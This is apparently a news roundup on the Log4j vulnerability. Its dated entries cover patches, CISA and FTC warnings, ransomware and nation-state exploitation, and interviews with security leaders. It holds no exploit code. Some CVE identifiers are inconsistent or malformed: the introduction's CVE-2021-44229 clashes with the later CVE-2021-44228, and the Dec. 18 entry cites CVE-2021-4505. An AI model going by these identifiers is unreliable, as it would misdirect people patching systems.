Log4j Updates: Flaw Challenges Global Security LeadersISMG Team's Latest News and Views of Critical Zero-Day and Its Impact
The security world continues its fight against potential widespread exploitation of the critical remote code execution vulnerability - tracked as CVE-2021-44229 - in Apache's Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell" and "Logjam."
As the U.S. Cybersecurity and Infrastructure Security Agency warns, Log4j is "very broadly used in variety of consumer and enterprise services, websites, and applications - as well as in OT products - to log security and performance information." An unauthenticated remote actor, CISA warns, could exploit this vulnerability to take control of an affected system.
Here, you'll find Information Security Media Group's ongoing coverage around Log4j - including how to navigate the patch process and how attackers are beginning to exploit it.
Jan. 26, 2022
VMware released a patch to fix the Log4j remote code execution flaw present in its software last December and has issued guidance on mitigation. But in its new report, BlackBerry says its security research team has tracked cryptomining software and Cobalt Strike deployments on Horizon. The latter tool is marketed as "software for adversary simulations and red team operations," but attackers regularly use cracked copies of the tool to build botnets. BlackBerry also says tactics, techniques and procedures related to Prophet Spider IAB - which is known to sell network access to other criminals, including ransomware gangs - have been spotted.
Jan. 25, 2022
Microsoft researchers tracking Apache Log4j exploits last week discovered a previously undisclosed vulnerability in SolarWinds' Serv-U software, which the firm has since confirmed and patched.
Jan. 21, 2022
Exploitable vulnerabilities in the widely used Apache Log4j logging software have left security teams scrambling to identify where the software is used in their environment as well as how to guard against it being exploited.
Jan. 20, 2022
Although there have been no major compromises in the healthcare and public health sector to date involving Apache Log4j flaws, the health sector remains highly vulnerable, as do other industries, federal regulators warn.
Jan. 17, 2022
Ian Keller, security director at Ericsson, discusses a structured approach to mitigating the Log4j vulnerability. "I would advise security teams to use scanning tools native to their organization to identify the Log4j kind of vulnerabilities and zero-day gaps," he says.
Jan. 12, 2022
Night Sky ransomware appears to be new. It was first spotted by security research group MalwareHunterTeam, which on Jan. 1 reported finding a dedicated data leak site for attacks tied to that strain of ransomware. As such, it means the attackers are practicing double extortion, meaning they demand payment not just for a decryptor, but also to not release stolen data.
Jan. 10, 2022
Top U.S. cybersecurity leaders continue to warn against the perils of Apache Log4j vulnerabilities, confirming in a press conference that hundreds of millions of devices worldwide are likely affected by the logging utility flaw, although the response, in terms of scope and speed, has been "exceptional." Director of CISA, Jen Easterly, discusses incident reporting and SBOM legislation.
Jan. 7, 2022
U.S. Sen. Gary Peters, D-Mich., who chairs the Homeland Security and Governmental Affairs Committee, said this week that he convened a virtual briefing with both the U.S. Cybersecurity and Infrastructure Security Agency and National Cyber Director Chris Inglis to discuss the Biden administration's efforts to mitigate the threat posed by the Log4j vulnerability. Also, read additional updates by CISA in regards to Log4j.
Jan. 6, 2022
The Apache Log4j vulnerability capped the end of a long year for CISOs and incident responders, and it left them with a mitigation project that carries them well into the New Year. CISOs John Bassett and Martin Dinel discuss how their teams have tackled Log4j - and significant lessons learned.
Jan. 5, 2022
The U.S. Federal Trade Commission, the nation's top consumer protection agency, issued notice that organizations failing to mitigate against Apache's Log4j vulnerabilities may face legal action.
Jan. 4, 2022
In an update to its Apache Log4j vulnerability guidance, Microsoft says exploitation attempts and testing for vulnerable systems and devices remained "high" through late December. This comes after security leaders have identified several sophisticated and even state-backed cyberattacks or attempts targeting vulnerable devices in recent weeks. Also, CISA continues to advocate for SBOM.
Dec. 30, 2021
As network defenders continue to patch or mitigate against the remote code execution vulnerability in the Java-based logging utility Log4j, several cybersecurity vendors have issued scanning and assessment tools to speed up the identification process. Also, in an event on Tuesday with ISMG's CyberEdBoard, a members-only community of security executives and thought leaders, Eric Goldstein, executive assistant director for cybersecurity at CISA, stressed the significance of Log4j.
Dec. 29, 2021
ONUS, one of Vietnam's largest cryptocurrency platforms, has reportedly fallen victim to a ransomware attack that has been traced to Apache's remote code execution vulnerability, Log4j, via third-party payment software. CrowdStrike has also detected Chinese APT activity around the logging flaw.
Dec. 28, 2021
Another Log4j patch has been released by the Apache Foundation, the nonprofit that supports Apache's open-source software projects. Its Log4j version 2.17.1 fixes a newly disclosed remote code execution vulnerability tracked as CVE-2021-44832. The latest flaw is the fifth disclosed in under a month - four around Log4j and another detected in the "logback" framework. All target the easily exploitable, arbitrary remote code execution flaw in the Java-based logging utility - which experts say is present in millions of devices worldwide, or more.
Dec. 24, 2021
The latest edition of the ISMG Security Report features an analysis of the most recent developments in the Log4j security flaw crisis as well as incident response essentials for the ransomware era.
Dec. 22, 2021
CISA, the FBI, the NSA and several of their international law enforcement partners have issued a joint advisory on the known vulnerabilities in the Apache Log4j software library urging "any organization using products with Log4j to mitigate and patch immediately.
A week after announcing a new bug bounty program called "Hack DHS," intended to safeguard the federal agency's systems, U.S. Department of Homeland Security Secretary Alejandro Mayorkas announced that DHS is expanding the scope of the program to include finding and patching Log4j-related vulnerabilities in the systems.
Since mid-December, enterprises globally have been responding to urgency of the Apache Log4j zero-day. John Ayers of Optiv discusses Optiv MXDR and how it helps customers detect, respond and provide visibility to protect from potential exploits.
Dec. 21, 2021
Belgium's Ministry of Defense announced it had fallen victim to a cyberattack linked to the Log4j vulnerability tracked as CVE-2021-44228. The attack reportedly "paralyzed the ministry's activities for several days." Also, Cryptolaemus, a security research group, made connections between Log4j and Dridex banking malware and the Meterpreter pen-testing tool.
The Log4j vulnerability has underscored once again the widespread dependence on open-source software projects and the lurking risks. Patrick Dwyer of OWASP says such projects deserve more resources to avoid major security vulnerabilities.
Dec. 20, 2021
Ransomware-as-a-service continues to be a model cybercriminals are latching onto, with top variants accounting for the majority of the attacked: LockBit, Conti, BlackMatter, and Hive. Conti, in particular, are exploring ways to leverage attacks using the Log4j vulnerability.
Dec. 18, 2021
A third version of Apache Log4j - version 2.17 - fixes yet another highly sensitive denial-of-service vulnerability - CVE-2021-4505. The newly detected vulnerability was found in 2.16 and all other versions.
Cybersecurity firms, such as Blumira and Juniper Threat Labs, have uncovered multiple new attacks stemming from the Log4j vulnerability. Researchers say nation-state attackers are beginning to abuse and test the vulnerability while cybercriminals are targeting the flaw to drop malicious code, from ransomware to cryptomining software. Others are harvesting credentials to sell on the dark web.
Dec. 17, 2021
In an emergency directive issued on Friday regarding the explosive Apache Log4j vulnerabilities, CISA has required federal civilian departments and agencies to assess their internet-facing network assets and immediately patch the systems or implement appropriate mitigation measures.
Healthcare sector entities, like organizations across most industries, are being warned by authorities to carefully assess how the recently identified remote code execution vulnerability in the Apache Log4j Java logging library might affect their environments. What steps should they take?
In the latest weekly update, four editors at ISMG discuss important cybersecurity issues, including mitigating the Apache Log4j zero-day vulnerability, findings from a new report analyzing the Conti ransomware attack on Ireland's Health Services Executive and President Biden's drive to tighten export controls on certain offensive cyber tools.
The latest edition of the ISMG Security Report features an analysis of the Log4j security flaw, including the risks and mitigation techniques, how to patch Log4j, and CISO Dawn Cappelli on Log4j response.
Dec. 16, 2021
Cybersecurity experts are warning that a number of attackers tied to nation-states appear to be actively abusing or testing the Apache Log4j vulnerability. Criminal groups have also begun to target the flaw to drop malicious code, including crypto-locking malware, and well-known access brokers are using the flaw to gather enterprise access credentials for sale to other attackers, including ransomware groups, some experts warn.
Dec. 15, 2021
The question now facing already overworked teams attempting to identify software and hardware that might have the flaw, test and deploy patches, and mitigate any attempts to exploit their systems before such fixes can be deployed, is now: Which version of the patched software should they deploy - 2.15.0 or the newly released 2.16.0?
What's in store for defenders as attackers increasingly move to target the widespread Apache Log4j flaw present in many different types of software and hardware?
"Everyone is a target," says cybersecurity expert Etay Maor, whose team at Israeli secure access service edge company Cato Networks has been analyzing hundreds of attacks that attempt to exploit the Log4j vulnerability.
Dec. 14, 2021
Experts warn that mitigating the Log4j version 2.14.x problem will be more akin to a marathon than a sprint. That's because Log4j is used by numerous vendors, and many have yet to identify all products at risk or develop and release patches. Once they do, enterprise IT and security teams will need to thoroughly test those patches to ensure they don't break existing setups, before rolling them out to production.
Like CISOs everywhere, Dawn Cappelli of Rockwell Automation awoke last Friday to news about the Log4j vulnerability and the risk it posed to her company, customers and partners. Here is how she approached triage, response and capturing insights to be shared with other security leaders.
Dec. 13, 2021
Multiple security researchers have now spotted several instances of threat actors exploiting the Apache Log4j vulnerability by deploying malwares including Muhstik and Mirai botnets or by scanning for vulnerable servers. Responders are advised to check for compromise before they implement fixes.
For many security teams, it's been all hands on deck since the Apache Log4j zero day vulnerability recently came to light. Experts say the flaw may be the most serious security vulnerability to have emerged in years.
Dec. 11, 2021
Urgent application of a temporary fix is advised as advanced persistent threat-level actors and access brokers are now reported to be conducting mass scanning for the zero-day vulnerability detected in the Java logging library Apache Log4j, which can result in full server takeover and leaves countless applications vulnerable.
How serious is the Apache Log4j zero-day vulnerability that was announced to the world on Friday? "It's big," says Sam Curry, chief security officer at Cybereason, which has developed a 'vaccine' to help mitigate the vulnerability. "I hate hyperbole generally," Curry says. "But it is a 10 on the criticality scale."
Dec. 10, 2021
A zero-day vulnerability detected in the Java logging library Apache Log4j can result in full server takeover and leaves countless applications vulnerable, according to security researchers, who say that the easily exploitable flaw was first detected in the popular game Minecraft.